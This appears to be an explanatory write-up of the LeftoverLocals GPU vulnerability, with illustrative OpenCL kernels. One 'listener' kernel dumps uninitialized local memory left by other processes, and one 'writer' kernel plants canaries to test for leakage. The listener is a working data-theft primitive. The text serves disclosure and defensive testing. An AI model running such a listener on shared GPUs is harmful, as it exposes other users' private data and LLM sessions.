The vulnerability allows an attacker with access to a shared GPU through its programmable interface to recover data left in local memory by other users and processes, violating traditional process isolation guarantees. This data leakage can have severe security consequences, especially given the rise of ML systems, where local memory is used to store model inputs, outputs, and weights. The researchers have released a proof of concept that exploits the vulnerability and have tested it across a wide variety of GPU devices, finding that GPUs from Apple, Qualcomm, AMD, and Imagination are vulnerable to LeftoverLocals.
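To make the attack concrete, here is a minimal sketch (in OpenCL C) of the kind of "listener" kernel such an attack relies on; the kernel name, `LM_SIZE`, and the dump-buffer layout are illustrative assumptions, not code taken from the released proof of concept:

```c
#define LM_SIZE 4096  /* illustrative: number of local-memory words to dump */

__kernel void listener(__global volatile int *dump) {
  /* On a vulnerable GPU, local memory is not cleared between kernel
     launches, so this deliberately uninitialized array may still hold
     values written by an earlier kernel from another process. */
  __local volatile int lm[LM_SIZE];
  for (int i = get_local_id(0); i < LM_SIZE; i += get_local_size(0)) {
    /* Copy the leftover contents to a host-visible global buffer,
       one LM_SIZE region per workgroup. */
    dump[LM_SIZE * get_group_id(0) + i] = lm[i];
  }
}
```

On an unaffected platform, the dumped buffer should contain only cleared (typically zeroed) memory; on a vulnerable one, it contains whatever the previous kernel left behind, such as intermediate values from an ML framework's matrix multiplications.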
Key takeaways:
- Researchers have discovered a vulnerability, named LeftoverLocals, that allows recovery of data from GPU local memory created by another process on Apple, Qualcomm, AMD, and Imagination GPUs (a canary-based check for this leakage is sketched after this list).
- This vulnerability affects the security of GPU applications as a whole, with particular significance for LLMs and ML models run on vulnerable GPU platforms.
- The researchers built a proof of concept in which an attacker can listen in on another user's interactive LLM session across process or container boundaries.
- This vulnerability highlights that many parts of the ML development stack have unknown security risks and have not been rigorously reviewed by security experts.
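As noted in the first takeaway, whether a given GPU exhibits this leakage can be checked with a complementary "writer" kernel: one process fills local memory with a known canary value, then a listener launched from a different process dumps local memory and scans for that canary. The sketch below is again illustrative OpenCL C; `CANARY`, `LM_SIZE`, and the kernel name are assumptions rather than the proof of concept's actual identifiers:

```c
#define LM_SIZE 4096  /* must match the listener's dump size */
#define CANARY  123   /* illustrative marker value */

__kernel void writer(__global volatile int *dummy) {
  /* Fill local memory with a recognizable canary. If a listener
     launched later from a different process observes CANARY in its
     uninitialized local array, local memory leaks across process
     boundaries. */
  __local volatile int lm[LM_SIZE];
  for (int i = get_local_id(0); i < LM_SIZE; i += get_local_size(0)) {
    lm[i] = CANARY;
  }
  /* Read one element back through a global pointer so the compiler
     cannot eliminate the local-memory stores as dead code. */
  dummy[get_local_id(0)] = lm[get_local_id(0)];
}
```

The `volatile` qualifiers are a deliberate design choice: without them, a compiler could legally optimize away both the canary stores and the reads of uninitialized local memory, hiding the leak.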